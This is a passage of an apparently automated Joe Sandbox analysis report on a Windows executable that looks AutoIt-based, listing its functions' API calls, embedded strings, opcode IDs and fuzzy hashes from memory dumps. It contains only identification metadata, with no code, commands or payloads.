                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Virtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4278518827-0
                                                                                                                    • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                                                    • Instruction ID: eabbe85e9c315deb4bfbba51e95e1dcd0fed78936d5793948cbc604aaf0d77b3
                                                                                                                    • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                                                                    • Instruction Fuzzy Hash: F21130629056408AD788DF3DDC481697BB2FB69F08B949034C7498F2B5EE3994AAC790
                                                                                                                    Function 00007FF7BB85DA1C Relevance: 9.0, APIs: 6, Instructions: 34windowtimethreadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 839392675-0
                                                                                                                    • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                                                    • Instruction ID: deedc221a9f06018b7e96562a0b7b63f2a6d4d16e2a8ea0f98be59fc6a557fe2
                                                                                                                    • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                                                                    • Instruction Fuzzy Hash: B5018432A1474183EB10AB29E818969B361FF9AB95F846134CE4A06B38DF3CE1588B40
                                                                                                                    Function 00007FF7BB84F378 Relevance: 9.0, APIs: 6, Instructions: 33threadwindowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$CurrentProcessWindow$AttachInputMessageSendTimeout
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 179993514-0
                                                                                                                    • Opcode ID: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                                                    • Instruction ID: d4744106c62a459d3b15f2329103862d9e83e402bf0ae545c2fdb9c160beaf0a
                                                                                                                    • Opcode Fuzzy Hash: 3c8edd0cfd7487a94cc2a97b78295d5ab7e6e6e303c53cb727e1080bae55b3ee
                                                                                                                    • Instruction Fuzzy Hash: 79F04431F1875243FB506B7DE84C6A9A291BF99744FC46034DE4E02B68DE3CE5698B90
                                                                                                                    Function 00007FF7BB84D868 Relevance: 9.0, APIs: 6, Instructions: 22memorysynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 146765662-0
                                                                                                                    • Opcode ID: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                                                    • Instruction ID: 9413dc39b80e3a041bdadb741abb78e3834bbc145dd8443ca724aad264d4c2f0
                                                                                                                    • Opcode Fuzzy Hash: d3946954f153790a4c7b3048297fa9f332d93d6b437e3fe9da6548dd2ef4d2ab
                                                                                                                    • Instruction Fuzzy Hash: 71F0A225A14B02C2DF04EF7EE858069A361FF99FA5B446131CE5E4637CCE3CE5A98350
                                                                                                                    Function 00007FF7BB877E38 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 1653399731-2785691316
                                                                                                                    • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                                                    • Instruction ID: f706ae95cca5a464f17908af698f2a8b01f75afc9a2824b29dee4205c8dd73f3
                                                                                                                    • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                                                                    • Instruction Fuzzy Hash: B3B18E32A046418AEB10EF6AE4401ADB7B4FB99798F900136EF4D53B68DF38E595C790
                                                                                                                    Function 00007FF7BB87CDF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF7BB87BF47), ref: 00007FF7BB87CE29
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower
                                                                                                                    • String ID: cdecl$none$stdcall$winapi
                                                                                                                    • API String ID: 2358735015-567219261
                                                                                                                    • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                                                    • Instruction ID: 217397568e155369cc8f1d576f74cb8ebb5de0c60181d79ae7b4082a55befd48
                                                                                                                    • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                                                                    • Instruction Fuzzy Hash: 2191EA23B1965281EA64AF2EC440579A391BF36788BD04131DF1D537B8DF7DE8A2C7A0
                                                                                                                    Function 00007FF7BB876920 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 212COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                    • API String ID: 4237274167-1221869570
                                                                                                                    • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                                                    • Instruction ID: 7a542d701ec27b644d4cd03954f017a616cb66eb1faf1f1aa106171e861ad3bb
                                                                                                                    • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                                                                    • Instruction Fuzzy Hash: A2919126B08B4285EB10EFAED4402ACB365FF5AB88B854432DF4D57769DF38E455C3A0
                                                                                                                    Function 00007FF7BB850EAF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 00007FF7BB850EDB
                                                                                                                      • Part of subcall function 00007FF7BB850B90: CharUpperBuffW.USER32(?,?,00000001,00007FF7BB850F61), ref: 00007FF7BB850C6A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharForegroundUpperWindow
                                                                                                                    • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                                                                    • API String ID: 3570115564-1994484594
                                                                                                                    • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                                                    • Instruction ID: e967c33853dd6cf76120ece53a017f8887676a83b9e557f78032698c47d99ef9
                                                                                                                    • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                                                                    • Instruction Fuzzy Hash: 0D71B212B0864285EA65BB6DD4A12B9E2A1BF76784FC44131DF0D862BCEF7CE554C3B0
                                                                                                                    Function 00007FF7BB859898 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                                                                    • API String ID: 3964851224-769500911
                                                                                                                    • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                                                    • Instruction ID: 5e5a6e307bc9461004520911be6271fa86bb40ccc5f96901fda600571fa91eb7
                                                                                                                    • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                                                                    • Instruction Fuzzy Hash: D341C622B1965381EA606B2D9484179E3D1BB76BD0B940631DF5D437ACEE3DE86283E0
                                                                                                                    Function 00007FF7BB819B18 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                    • String ID: #$E$O
                                                                                                                    • API String ID: 3215553584-248080428
                                                                                                                    • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                                                    • Instruction ID: 4afbaeeb428d03cd3c33fdf450be52955723290ee93a56256102bc1a1ad9f0ce
                                                                                                                    • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                                                                    • Instruction Fuzzy Hash: 96418622A1675185EF51AF2D98402ADA3E4BFAAB48F484131EF4D0776CDF3CD462C3A0
                                                                                                                    Function 00007FF7BB85B62C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                                                                    • String ID: \*.*
                                                                                                                    • API String ID: 3196045410-1173974218
                                                                                                                    • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                                                    • Instruction ID: c6eef03022a074254826eb3f6cc3162817f5ba4075063a8c9ba81a8201402e93
                                                                                                                    • Opcode Fuzzy Hash: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                                                                    • Instruction Fuzzy Hash: 39411E22A0464295EB20EF2CD8801FDA7A4FF66788FC00035DE4D53ABDEF28D559C790
                                                                                                                    Function 00007FF7BB84DF3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$ClassName
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 787153527-1403004172
                                                                                                                    • Opcode ID: 4f09d16dc78bbaa7f3df6885d98594882fff825503697979779001f5d2c25e46
                                                                                                                    • Instruction ID: 13ca9f52c2e1a465118e21077efe143e98f5699a565b3cf3c1e2c519f5c32809
                                                                                                                    • Opcode Fuzzy Hash: 4f09d16dc78bbaa7f3df6885d98594882fff825503697979779001f5d2c25e46
                                                                                                                    • Instruction Fuzzy Hash: E231E622A0864286EA24FB1DE4501B9E360FFAAB84FC44131DF9D437B9CE3CE615C760
                                                                                                                    Function 00007FF7BB86D914 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3113390036-3916222277
                                                                                                                    • Opcode ID: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                                                    • Instruction ID: f6c640d1c8ce34ab33506c235f1885be20977ec40977b9060746af02c9bf0bbe
                                                                                                                    • Opcode Fuzzy Hash: fe032384e3ae49ab6650df1e9e36687832eb56e7d0293f7a573cd5f7425b5e8f
                                                                                                                    • Instruction Fuzzy Hash: 6031EC22A0C74281FB60AF1DE414AAEA351FB9A784F945131DF4E97B6DDE3CD4228790
                                                                                                                    Function 00007FF7BB8893E8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowlibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                    • Opcode ID: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                                                    • Instruction ID: d3abb12c5ba0c3c7df49ba4923df06bb58254580215b0963346cee0949701aa3
                                                                                                                    • Opcode Fuzzy Hash: 3e4d22fa235855ff4f2554ab96e3220b01af827ee5636b6f724e9c857c26afd0
                                                                                                                    • Instruction Fuzzy Hash: C3317232609781CBE7609F28E44876A73A0FB96B80F905135DB5D47BA8DF3CD454CB90
                                                                                                                    Function 00007FF7BB809164 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                    • Opcode ID: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                                                    • Instruction ID: ce80d9d7be223e854322c31539399e90392e4148fcd7520b3d767eda3aad71d7
                                                                                                                    • Opcode Fuzzy Hash: ec043f9b6fed639492fe08c1f7567e430e68234150a908e2993f018ebf9edeab
                                                                                                                    • Instruction Fuzzy Hash: 61F03121B19B4291EF44AB2DE444279A3A1FF99790FC42035EE4F46678DE3CE455C690
                                                                                                                    Function 00007FF7BB8289B4 Relevance: 7.8, APIs: 5, Instructions: 265COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000F.00000002.2358314618.00007FF7BB7E1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7BB7E0000, based on PE: true
                                                                                                                    • Associated: 0000000F.00000002.2358289855.00007FF7BB7E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB895000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358677007.00007FF7BB8B8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358750045.00007FF7BB8CA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    • Associated: 0000000F.00000002.2358780294.00007FF7BB8D4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_15_2_7ff7bb7e0000_rMpqCJnPv.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2f06d0b1d19ede39c94ed452b1c65b617356a11cb49397c7e380f0e2becba314
                                                                                                                    • Instruction ID: 8afbc249d27482104cbd570ca2f10c67e917b65e97f1ff813d161168ec50f6c7
